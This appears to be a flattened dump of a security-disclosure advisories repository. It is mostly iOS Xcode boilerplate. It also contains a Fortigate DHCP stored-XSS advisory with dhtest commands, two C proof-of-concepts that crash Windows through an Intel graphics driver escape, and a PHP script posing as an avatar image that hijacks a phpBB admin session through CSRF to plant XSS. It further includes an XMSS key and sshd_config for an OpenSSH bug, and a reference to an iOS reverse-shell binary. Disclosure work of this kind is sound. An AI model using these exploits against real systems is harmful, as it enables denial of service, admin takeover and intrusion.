| { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view, typically from a nib. 20 | } 21 | 22 | 23 | - (void)didReceiveMemoryWarning { 24 | [super didReceiveMemoryWarning]; 25 | // Dispose of any resources that can be recreated. 26 | } 27 | 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // powend 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend (code)/powend.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.application-groups 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 8 | 20 | 21 | 22 | 24 | 36 | 37 | 38 | 40 | 52 | 53 | 54 | 56 | 66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | powend.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendTests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendTests/powendTests.m: -------------------------------------------------------------------------------- 1 | // 2 | // powendTests.m 3 | // powendTests 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface powendTests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation powendTests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | // Put setup code here. This method is called before the invocation of each test method in the class. 20 | } 21 | 22 | - (void)tearDown { 23 | // Put teardown code here. This method is called after the invocation of each test method in the class. 24 | [super tearDown]; 25 | } 26 | 27 | - (void)testExample { 28 | // This is an example of a functional test case. 29 | // Use XCTAssert and related functions to verify your tests produce the correct results. 30 | } 31 | 32 | - (void)testPerformanceExample { 33 | // This is an example of a performance test case. 34 | [self measureBlock:^{ 35 | // Put the code you want to measure the time of here. 36 | }]; 37 | } 38 | 39 | @end 40 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendUITests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /SSD Advisory - 3944/powendUITests/powendUITests.m: -------------------------------------------------------------------------------- 1 | // 2 | // powendUITests.m 3 | // powendUITests 4 | // 5 | // Created by simo on 30/08/2018. 6 | // Copyright © 2018 simo ghannam. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface powendUITests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation powendUITests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | 20 | // Put setup code here. This method is called before the invocation of each test method in the class. 21 | 22 | // In UI tests it is usually best to stop immediately when a failure occurs. 23 | self.continueAfterFailure = NO; 24 | // UI tests must launch the application that they test. Doing this in setup will make sure it happens for each test method. 25 | [[[XCUIApplication alloc] init] launch]; 26 | 27 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this. 28 | } 29 | 30 | - (void)tearDown { 31 | // Put teardown code here. This method is called after the invocation of each test method in the class. 32 | [super tearDown]; 33 | } 34 | 35 | - (void)testExample { 36 | // Use recording to get started writing UI tests. 37 | // Use XCTAssert and related functions to verify your tests produce the correct results. 38 | } 39 | 40 | @end 41 | -------------------------------------------------------------------------------- /SSD Advisory - 3987/readme.md: -------------------------------------------------------------------------------- 1 | # SSD Advisory - Fortigate DHCP Stored XSS 2 | 3 | **Vulnerability Summary** 4 | The following advisory describes a Stored XSS Vulnerability found in Fortinet's Fortigate Firewall(FortiOS) via an unauthenticated DHCP packet. 5 | 6 | **CVE** 7 | CVE-2019-6697 8 | 9 | **Credit** 10 | An independent Security Researcher, Toshitsugu Yoneyama, has reported this vulnerability to SSD Secure Disclosure program. 11 | 12 | **Affected systems** 13 | FortiOS v6.0.4 build 0231. 14 | 15 | **Vendor Response** 16 | Fortigate has fixed the vulnerability in FortiOS version 6.2.2 17 | 18 | **Vulnerability Details** 19 | An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor. This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection 20 | 21 | ![](https://ssd-disclosure.com/wp-content/uploads/2019/07/fortigate_device_detection.png) 22 | When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability: 23 | 24 | 1. Install dhtest or any other tool that can send arbitrary DHCP packets. 25 | (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/) 26 | 2. Send a malicious DHCP packet. For example: 27 | 28 | ``` 29 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "xx" 30 | [Option] 31 | -m : mac address 32 | -h : hostname(dhcp option 12). The attacker can inject malicious scripts. 33 | ``` 34 | 35 | 3. Once the victim logs into Fortigate's dashboard and goes to the "DHCP Monitor" 36 | (https:///ng/dhcp/monitor) the browser will execute the malicious script injected by the attacker. 37 | 38 | ![](https://ssd-disclosure.com/wp-content/uploads/2019/07/fortigate_alert_popup.png) 39 | 40 | But there are a few limitations: 41 | The user's input is validated, not allowing us to use tags like `` and other similar options. There are also character count limits: 42 | 43 | * DHCP option 12 has a string size limit allowing only up to 256 characters. More information about this option is available in the RFC. 44 | * Fortigate's string size can't be longer than 128 characters. 45 | 46 | However, Fortigate uses jQuery which allows the attacker to bypass the mentioned restrictions and execute arbitrary scripts using the following method: 47 | 48 | ``` 49 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "xx" 50 | ``` -------------------------------------------------------------------------------- /SSD Advisory - 3991/poc.c: -------------------------------------------------------------------------------- 1 | #define BUF_SIZE 100 2 | 3 | static const char* intel = "Intel"; 4 | 5 | typedef struct { 6 | UINT unknown1; 7 | UINT unknown2; 8 | UINT escape_jmp_table_index; 9 | UINT switchcase_index; 10 | char buffer[BUF_SIZE]; 11 | } PrivateDriverData; 12 | 13 | int main() 14 | { 15 | int result = 0; 16 | DRIVER_INFO driverInfo = { 0 }; 17 | D3DKMT_ESCAPE escapeObj = { 0 }; 18 | PrivateDriverData data = { 0 }; 19 | int status = initDriver(&driverInfo, intel); 20 | if (!NT_SUCCESS(status)) { 21 | printf("Could not initialize connection to driver"); 22 | return -1; 23 | } 24 | printf("[+] Initialized driver\n"); 25 | escapeObj.Type = D3DKMT_ESCAPE_DRIVERPRIVATE; 26 | escapeObj.hAdapter = driverInfo.hAdapter; 27 | escapeObj.hDevice = (D3DKMT_HANDLE)NULL; 28 | data.unknown1 = 'AAAA'; 29 | data.unknown2 = 'BBBB'; 30 | data.escape_jmp_table_index = 1; 31 | data.switchcase_index = 205; // vulnerable case 32 | memset(data.buffer, 'A', BUF_SIZE); 33 | 34 | escapeObj.pPrivateDriverData = (void*)&data; 35 | escapeObj.PrivateDriverDataSize = sizeof(data); 36 | status = D3DKMTEscape(&escapeObj); // Will not return, it will crash the system. 37 | if (!NT_SUCCESS(status)) { 38 | printf("[-] D3DKMTEscape failed (%x)", status); 39 | } 40 | getchar(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /SSD Advisory - 4002/poc.c: -------------------------------------------------------------------------------- 1 | #define BUF_SIZE 100 2 | 3 | static const char* intel = "Intel"; 4 | 5 | typedef struct { 6 | UINT unknown1; 7 | UINT unknown2; 8 | UINT escape_jmp_table_index; 9 | UINT switchcase_index; 10 | char buffer[BUF_SIZE]; 11 | } PrivateDriverData; 12 | 13 | int main() 14 | { 15 | int result = 0; 16 | DRIVER_INFO driverInfo = { 0 }; 17 | D3DKMT_ESCAPE escapeObj = { 0 }; 18 | PrivateDriverData data = { 0 }; 19 | int status = initDriver(&driverInfo, intel); 20 | if (!NT_SUCCESS(status)) { 21 | printf("Could not initialize connection to driver"); 22 | return -1; 23 | } 24 | printf("[+] Initialized driver\n"); 25 | escapeObj.Type = D3DKMT_ESCAPE_DRIVERPRIVATE; 26 | escapeObj.hAdapter = driverInfo.hAdapter; 27 | escapeObj.hDevice = (D3DKMT_HANDLE)NULL; 28 | data.unknown1 = 'AAAA'; 29 | data.unknown2 = 'BBBB'; 30 | data.escape_jmp_table_index = 1; 31 | data.switchcase_index = 205; // vulnerable case 32 | memset(data.buffer, 'A', BUF_SIZE); 33 | 34 | escapeObj.pPrivateDriverData = (void*)&data; 35 | escapeObj.PrivateDriverDataSize = sizeof(data); 36 | status = D3DKMTEscape(&escapeObj); // Will not return, it will crash the system. 37 | if (!NT_SUCCESS(status)) { 38 | printf("[-] D3DKMTEscape failed (%x)", status); 39 | } 40 | getchar(); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /SSD Advisory - 4007/poc/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4007/poc/avatar.png -------------------------------------------------------------------------------- /SSD Advisory - 4007/poc/poc.php: -------------------------------------------------------------------------------- 1 | customCode(). 7 | $custom_shortcode = "[xss]{TEXT}[/xss]"; 8 | 9 | // the HTML replacement. You can also hardcore the code between the script tags. 10 | $shortcode_replacement = ""; 11 | 12 | 13 | // If a session ID is available, attempt the CSRF exploit 14 | if(strpos($_SERVER['HTTP_REFERER'], 'sid') !== false) { 15 | 16 | // leak the session ID of the nonce 17 | $parts = parse_url($_SERVER['HTTP_REFERER']); 18 | parse_str($parts['query'], $query); 19 | 20 | if(!isset($query['sid'])) { 21 | header('Content-Type: image/png'); 22 | $img = imagecreatefrompng('avatar.png'); 23 | imagepng($img); 24 | die; 25 | } 26 | 27 | 28 | // build the CSRF payload 29 | $payload = http_build_query( 30 | array( 31 | 'bbcode_match' => $custom_shortcode, 32 | 'bbcode_tpl' => $shortcode_replacement, 33 | 'i' => 'acp_bbcodes', 34 | 'mode' => 'bbcodes', 35 | 'action' => 'create', 36 | 'sid' => $query['sid'] 37 | ) 38 | ); 39 | 40 | // adm is the default admin URL 41 | $exploit_url = $target_url . "/adm/?" . $payload; 42 | 43 | header('Location: ' . $exploit_url); 44 | } else { 45 | header('Content-Type: image/png'); 46 | $img = imagecreatefrompng('avatar.png'); 47 | imagepng($img); 48 | die; 49 | } 50 | -------------------------------------------------------------------------------- /SSD Advisory - 4033/poc/id_xmss: -------------------------------------------------------------------------------- 1 | -----BEGIN OPENSSH PRIVATE KEY----- 2 | b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAdQAAABRzc2gteG 3 | 1zc0BvcGVuc3NoLmNvbQAAABVYTVNTX1NIQTItMjU2X1cxNl9IMTAAAABA6AGQGHXMA73w 4 | KLpuqU8Ht02RurQk3BDTApfcvoG6H+aX6Lo1AAPueXtOyDYOncuYYAkzWctIw6eZoJLjyc 5 | CS9wAABoDxTenn8U3p5wAAABRzc2gteG1zc0BvcGVuc3NoLmNvbQAAABVYTVNTX1NIQTIt 6 | MjU2X1cxNl9IMTAAAABA6AGQGHXMA73wKLpuqU8Ht02RurQk3BDTApfcvoG6H+aX6Lo1AA 7 | PueXtOyDYOncuYYAkzWctIw6eZoJLjycCS9wAAAIQAAAAAGysMKp3xNmQpvFt5EsYl3dfa 8 | fuZC3M/JhpLzPBvD2C13tdMvPJ5UHkxRblS3mMN4F2ra/4qwu4Q7fQvTeW3GSJfoujUAA+ 9 | 55e07INg6dy5hgCTNZy0jDp5mgkuPJwJL36AGQGHXMA73wKLpuqU8Ht02RurQk3BDTApfc 10 | voG6H+YCAAAAFmFlczI1Ni1nY21Ab3BlbnNzaC5jb20AAAAsw318Sx+otYjbbKMVuyT0TM 11 | UK4aDVOuID76y1cJBlwoMUT0BA6xtNtYnFvz8AAAADaz0yAAAAAAAAAWAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAAAAAAAAAAAAUDvkV 19 | v62WIvfLPhjAanr8A0S6qxqsr0/WpQjlZ2aDzgQCqjcpqVJtBF6N8lXUGJWs590NXCjFAP 20 | 2OUi7t75JaCveqDRUDYlbzRpTM4G1Xa2UkcguSfqumKUhZtSTE5TwfxSbpT3K0eyT8JCOb 21 | 6kfD3nVEI8beTATGwSa1WhV4hByk4MhFbFpRALx5Bu3W5+E1lj3XGIeScPBdoKY2V04Y3K 22 | s+3kqreuLQVpjLNYD7+fwTCyFM1eMHusRQpFfAQSTgE8hXYeSMwbCleJv7bmkISlhaXfnz 23 | iISeuGU+zjbPj5uBRHfN4iT+VUVOuCm+iPMj4C95l+ZJGYkVWyAKm+AQ8wADOQsEWvvyOu 24 | H8mgtGU/yAP7V22EwGN5/ftDJPh2n5Ikw6nrMVXRMVerrlHm+pA5vUj6zr3u/ufzU+VmVl 25 | aMoAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 27 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 28 | AAAAAAAAAAAAAAABACGii5b5S7WzKhiJ6mmYj7Hg4CugAY4RHisa7gJbTbU3gYkH+SOzj5 29 | ph6Rj83WqLnUlKbIXQ7QmPBBvRaQfdKoSR8xKQtW27Vq4c1Y94nGzpWezBqs5KeB5ywzoT 30 | EuNM9885zK+GajrFMG9QaZsSTniDAW/qUw2Is8rHPJYFp12ISxIvn/L3u7oMVokyAlnlbH 31 | YDqFejUHwc2qErM3eeLaxhl5y65/vLch2jHNI6xj0SSGdBwRY2r1RQJ2P6ozA4EfWjtRBB 32 | kGEu4kbCz9+7e5lEnUTJ8hVKnPRuvNKPAY5xlGUQPTq5SfwZbKY7n30lJTx0epe51VfnBq 33 | 5yp1AZEHIAAAAgP2YsjdTrhEgbgusAYs3ukByjGcNBRp7BgpGNWyaQBfYAAAAIAAAAAAAA 34 | AAAAAAAAAQAAAAAAAAABAAAAAAAAAAABAAAAIAAAAAIAAAAAAAAAAAEAAABAAAAAAwAAAA 35 | AAAAAAAQAAAGAAAAAEAAAAAAAAAAABAAAAgAAAAAUAAAAAAAAAAAEAAACgAAAABgAAAAAA 36 | AAAAAQAAAMAAAAAHAAAAAAAAAAABAAAA4AAAAAtyb290QHVidW50dQECAw== 37 | -----END OPENSSH PRIVATE KEY----- 38 | -------------------------------------------------------------------------------- /SSD Advisory - 4033/poc/sshd_config: -------------------------------------------------------------------------------- 1 | Port 65535 2 | 3 | HostkeyAlgorithms ssh-xmss@openssh.com,ssh-xmss-cert-v01@openssh.com 4 | PubkeyAcceptedKeyTypes ssh-xmss@openssh.com,ssh-xmss-cert-v01@openssh.com 5 | 6 | # Change this to the full path of the xmss key 7 | HostKey /root/XMSS/p_xmss_bug/id_xmss 8 | 9 | PermitRootLogin yes 10 | 11 | ChallengeResponseAuthentication no 12 | 13 | AcceptEnv LANG LC_* 14 | 15 | PasswordAuthentication no -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/IOKit.framework/Versions/A/IOKit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/IOKit.framework/Versions/A/IOKit -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/ios_reverseshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/ios_reverseshell -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/xcuserdata/aa.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/project.xcworkspace/xcuserdata/aa.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/xcuserdata/aa.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019.xcodeproj/xcuserdata/aa.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | iospwn_typhoonPwn_2019.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | iospwn_typhoonPwn_2019.xcscheme_^#shared#^_ 13 | 14 | orderHint 15 | 0 16 | 17 | 18 | SuppressBuildableAutocreation 19 | 20 | 00AC132D22B2B30600ADCB27 21 | 22 | primary 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // iospwn_typhoonPwn_2019 4 | // 5 | // Created by aa on 6/13/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /SSD Advisory - 4066/poc/iospwn_typhoonPwn_2019/BNSA_exp.c: -------------------------------------------------------------------------------- 1 | // 2 | // BNSA_exp.c 3 | // UHAK_final 4 | // 5 | // Created by aa on 6/1/19. 6 | // Copyright © 2019 aa. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include "inject.h" 16 | #include 17 | #include 18 | #include 19 